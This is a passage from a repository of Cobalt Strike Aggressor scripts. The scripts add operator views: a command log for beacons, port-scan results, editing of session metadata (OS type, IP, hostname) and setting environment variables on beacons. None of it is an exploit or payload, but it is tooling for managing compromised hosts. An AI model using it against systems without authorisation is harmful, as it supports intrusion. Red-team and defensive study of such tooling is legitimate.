binfo($bid, "user"); 28 | $computer = binfo($bid, "computer"); 29 | $si = indexOf($computer, "("); 30 | $si = $si + 1; 31 | $ei = indexOf($computer, ")"); 32 | $pid = substr($computer, $si, $ei); 33 | %modelEntry['pid'] = $pid; 34 | %modelEntry['command'] = @entry[3]; 35 | %modelEntry['timestamp'] = formatDate(@entry[4], "MMM dd HH:mm:ss z"); 36 | # Add the new entry to $sshlog_model 37 | [$sshlog_model addEntry: %modelEntry]; 38 | } 39 | } 40 | # Update with the new table 41 | [$sshlog_model fireListeners]; 42 | }, \$sshlog_model); 43 | } 44 | 45 | # setupPopupMenu provided by Raphael Mudge 46 | # https://gist.github.com/rsmudge/87ce80cd8d8d185c5870d559af2dc0c2 47 | sub setupPopupMenu { 48 | # we're using fork({}) to run this in a separate Aggressor Script environment. 49 | # This reduces deadlock potential due to Sleep's global interpreter lock 50 | # 51 | # this especially matters as our mouse listener will be fired for *everything* 52 | # to include mouse movements. 53 | fork({ 54 | [$component addMouseListener: lambda({ 55 | if ([$1 isPopupTrigger]) { 56 | # If right click, show popup 57 | show_popup($1, $name, $component); 58 | } 59 | }, \$component, \$name)]; 60 | }, $component => $1, $name => $2, $sshlog_model => $sshlog_model, $sshlog_table => $sshlog_table); 61 | } 62 | 63 | sub createSSHLogVisualization { 64 | this('$sshlog_sorter'); 65 | # GenericTableModel from table.* 66 | # Columns for each data model 67 | $sshlog_model = [new GenericTableModel: @("operator", "ip", "hostname", "user", "pid", "command", "timestamp"), "beacon", 16]; 68 | 69 | # Create a table from the GenericTableModel 70 | $sshlog_table = [new ATable: $sshlog_model]; 71 | 72 | # Controls how the column headers will sort the table 73 | $sshlog_sorter = [new TableRowSorter: $sshlog_model]; 74 | [$sshlog_sorter toggleSortOrder: 3]; 75 | 76 | [$sshlog_sorter setComparator: 0, { 77 | return $1 cmp $2; 78 | }]; 79 | 80 | [$sshlog_sorter setComparator: 1, { 81 | return $1 cmp $2; 82 | }]; 83 | 84 | [$sshlog_sorter setComparator: 2, { 85 | return $1 cmp $2; 86 | }]; 87 | 88 | [$sshlog_sorter setComparator: 3, { 89 | return $1 <=> $2; 90 | }]; 91 | 92 | # Set $sshlog_sorter as the row sorter for $sshlog_table 93 | [$sshlog_table setRowSorter: $sshlog_sorter]; 94 | 95 | # Create a split pane (divider you can drag around) 96 | $sshlog_content = [new JScrollPane: $sshlog_table]; 97 | 98 | # Set popup menu for the table 99 | setupPopupMenu($sshlog_table, "command_log"); 100 | 101 | updateSSHLogTable(); 102 | 103 | # Register the visualization with CS 104 | addVisualization("Beacon Command Log", $sshlog_content); 105 | return $sshlog_content; 106 | } 107 | 108 | popup command_log { 109 | item "Copy Logs" { 110 | println("Right click captured!"); 111 | $selected = ""; 112 | foreach $row ([$sshlog_table getSelectedRows]) { 113 | # operator [ip_hostname] user/proc | timestamp> command 114 | $operator = [$sshlog_model getValueAt: $row, 0]; 115 | $ip = [$sshlog_model getValueAt: $row, 1]; 116 | $hostname = [$sshlog_model getValueAt: $row, 2]; 117 | $user = [$sshlog_model getValueAt: $row, 3]; 118 | $proc = [$sshlog_model getValueAt: $row, 4]; 119 | $time = [$sshlog_model getValueAt: $row, 6]; 120 | $command = [$sshlog_model getValueAt: $row, 5]; 121 | 122 | $selected .= "$operator \[$ip\_$hostname\] $user\/$proc | $time\> $command\n"; 123 | } 124 | add_to_clipboard($selected); 125 | } 126 | item "Copy Command" { 127 | println("Right click captured!"); 128 | $selected = ""; 129 | foreach $row ([$sshlog_table getSelectedRows]) { 130 | $command = [$sshlog_model getValueAt: $row, 5]; 131 | 132 | $selected .= $command; 133 | } 134 | add_to_clipboard($selected); 135 | } 136 | } 137 | 138 | popup generator { 139 | item "SSH Command Log" { 140 | # Show the visualization 141 | addTab("SSH Beacon Command Log", createSSHLogVisualization(), "All commands you have executed in a beacon"); 142 | } 143 | } 144 | 145 | on beacon_input { 146 | updateSSHLogTable(); 147 | } 148 | -------------------------------------------------------------------------------- /utils/modifyMetaData.cna: -------------------------------------------------------------------------------- 1 | sub openModifyMetaData { 2 | local('$bids $data_type $data_value'); 3 | $bids = $1; 4 | $data_type = $2; 5 | $data_value = $3; 6 | 7 | # setostype 8 | # setlocalip 9 | 10 | if ($data_type eq "setostype") { 11 | bsetostype($bids, $data_value); 12 | } else if ($data_type eq "setlocalip") { 13 | prompt_text("Modify Session MetaData(Internal IP): ", $data_value, lambda({ 14 | if ($1) { 15 | foreach $bid ($bids) { 16 | $o_ip = binfo($bid, "internal"); 17 | blog($bid, ""); 18 | blog($bid, "original IP : $o_ip "); 19 | } 20 | bsetlocalip($bids, $1); 21 | } 22 | }, $bids => $1)); 23 | } else if ($data_type eq "sethostname") { 24 | prompt_text("Modify Session MetaData(HostName): ", $data_value, lambda({ 25 | if ($1) { 26 | foreach $bid ($bids) { 27 | $o_hostname = binfo($bid, "computer"); 28 | blog($bid, ""); 29 | blog($bid, "original HostName: $o_hostname "); 30 | } 31 | bsethostname($bids, $1); 32 | } 33 | }, $bids => $1)); 34 | } 35 | } -------------------------------------------------------------------------------- /utils/portscan_result.cna: -------------------------------------------------------------------------------- 1 | #### Port Scan Results #### 2 | ## See and sort results from portscan module in a new tab 3 | ## Author: Alyssa (@ramen0x3f) 4 | ## Last Updated: 2018-08-08 5 | 6 | ## CREDIT ## 7 | # This script uses the awesome visualization/tab code made by @001SPARTaN (for @r3dqu1nn) 8 | # As seen here: https://github.com/harleyQu1nn/AggressorScripts/blob/master/logvis.cna 9 | 10 | ## Usage ## 11 | # View > "Port Scan Results". Click column to sort. 12 | 13 | ###################################################################### 14 | 15 | import ui.*; 16 | import table.*; 17 | 18 | import java.awt.*; 19 | import javax.swing.*; 20 | import javax.swing.table.*; 21 | 22 | global('$ps_model $ps_content $ps_table'); 23 | 24 | sub updatePSTable { 25 | fork({ 26 | local('$entry'); 27 | 28 | # Clear the model so we can put new stuff in it. 29 | [$ps_model clear: 1024]; 30 | 31 | foreach @entry (data_query('services')) { 32 | %modelEntry['address'] = @entry['address']; 33 | %modelEntry['port'] = @entry['port']; 34 | %modelEntry['banner'] = @entry['banner']; 35 | 36 | # Add the new entry to $ps_model 37 | [$ps_model addEntry: %modelEntry]; 38 | } 39 | # Update with the new table 40 | [$ps_model fireListeners]; 41 | }, \$ps_model); 42 | } 43 | 44 | sub createPSVisualization { 45 | this('$ps_sorter'); 46 | # GenericTableModel from table.* 47 | # Columns for each data model 48 | $ps_model = [new GenericTableModel: @("address", "port", "banner"), "beacon", 16]; 49 | 50 | # Create a table from the GenericTableModel 51 | $ps_table = [new ATable: $ps_model]; 52 | 53 | # Controls how the column headers will sort the table 54 | $ps_sorter = [new TableRowSorter: $ps_model]; 55 | [$ps_sorter toggleSortOrder: 3]; 56 | 57 | [$ps_sorter setComparator: 0, { 58 | return $1 cmp $2; 59 | }]; 60 | 61 | [$ps_sorter setComparator: 1, { 62 | return $1 cmp $2; 63 | }]; 64 | 65 | [$ps_sorter setComparator: 2, { 66 | return $1 cmp $2; 67 | }]; 68 | 69 | [$ps_sorter setComparator: 3, { 70 | return $1 <=> $2; 71 | }]; 72 | 73 | # Set $ps_sorter as the row sorter for $ps_table 74 | [$ps_table setRowSorter: $ps_sorter]; 75 | 76 | # Create a split pane (divider you can drag around) 77 | $ps_content = [new JScrollPane: $ps_table]; 78 | 79 | # Set popup menu for the table 80 | setupPopupMenu($ps_table, "portscan_res"); 81 | 82 | updatePSTable(); 83 | 84 | # Register the visualization with CS 85 | addVisualization("Port Scan Results", $ps_content); 86 | return $ps_content; 87 | } 88 | 89 | popup generator { 90 | item "Port Scan Results" { 91 | # Show the visualization 92 | addTab("Port Scan Results", createPSVisualization(), "All discovered services from portscan"); 93 | } 94 | } 95 | -------------------------------------------------------------------------------- /utils/setEnv.cna: -------------------------------------------------------------------------------- 1 | sub openSetEnvDialogCallBack { 2 | $envKey = $3['envKey']; 3 | $envValue = $3['envValue']; 4 | bcc2_setenv($beaconid, $envKey, $envValue); 5 | } 6 | 7 | sub openSetEnvDialog { 8 | $beaconid = $1; 9 | $dialog = dialog("SetEnv", %(beaconid => $beaconid, envKey => "TEST_PATH", envValue => "/usr/bin/:/usr/sbin/:/bin/:/sbin/"), &openSetEnvDialogCallBack); 10 | dialog_description($dialog, "setenv"); 11 | 12 | drow_text($dialog, "envKey", "envKey: ", ""); 13 | drow_text($dialog, "envValue", "envValue: ", ""); 14 | 15 | dbutton_action($dialog, "set"); 16 | dialog_show($dialog); 17 | } 18 | 19 | sub openUnSetEnvDialog{ 20 | $bids = $1; 21 | prompt_text("unsetenv: ", "TEST_PATH", lambda({ 22 | if ($1) { 23 | bcc2_unsetenv($bids, $1); 24 | } 25 | }, $bids => $1)); 26 | } --------------------------------------------------------------------------------